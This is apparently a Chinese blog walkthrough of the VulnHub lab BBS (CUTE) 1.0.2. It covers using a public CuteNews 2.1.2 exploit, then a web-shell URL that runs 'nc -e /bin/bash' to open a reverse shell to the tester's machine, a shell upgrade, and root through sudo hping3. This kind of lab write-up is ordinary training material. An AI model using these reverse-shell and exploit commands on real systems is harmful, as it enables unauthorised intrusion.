BBS (CUTE): 1.0.2

BBS (CUTE): 1.0.2 https://www.vulnhub.com/entry/bbs-cute-102,567/

靶场配置网络

登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式

ip add 看到网卡名字叫做ens33

需要修改网卡配置文件

vi /etc/network/interfaces

allow-hotplug ens33

iface ens33 1inet dhcp

重启获得IP地址

使用目录扫描,获得

http://192.168.204.134/index.php

留意到版本号CuteNews 2.1.2

在kali上操作

searchsploit cutenews 2.1.2 看到路径

cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./

修改py配置文件,将所有的/CuteNews删除

执行命令python3 48800.py

输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点

http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc -e /bin/bash 192.168.204.135 1234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)

python -c 'import pty;pty.spawn("/bin/bash")'

-c : 执行具体的代码

import :导入语句

pty : 终端(接口)

pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)

reset

通过sudo -l 查看权限

/usr/sbin/hping3 获得root权限

find / -name /root/root.txt

相关推荐
ALe要立志成为web糕手1 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
jingshaoyou1 天前
Strongswan linked_list_t链表 注释可独立运行测试
数据结构·链表·网络安全·list
鹅肝手握高V五色1 天前
Wireshark入门教程:如何抓取和过滤网络数据包
websocket·网络协议·tcp/ip·http·网络安全·https·udp
nixiaoge1 天前
RCE漏洞
网络安全
禾木KG1 天前
网络安全-等级保护(等保) 1-0 等级保护制度公安部前期发文总结
网络安全
网络抓包与爬虫1 天前
Wireshark——抓包分析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
仙女很美哦2 天前
Flutter视频播放、Flutter VideoPlayer 视频播放组件精要
websocket·网络协议·tcp/ip·http·网络安全·https·udp
CYRUS STUDIO2 天前
Unidbg Trace 反 OLLVM 控制流平坦化(fla)
android·汇编·算法·网络安全·逆向·ollvm
写代码的小王吧2 天前
【Java可执行命令】(十)JAR文件签名工具 jarsigner:通过数字签名及验证保证代码信任与安全,深入解析 Java的 jarsigner命令~
java·开发语言·网络·安全·web安全·网络安全·jar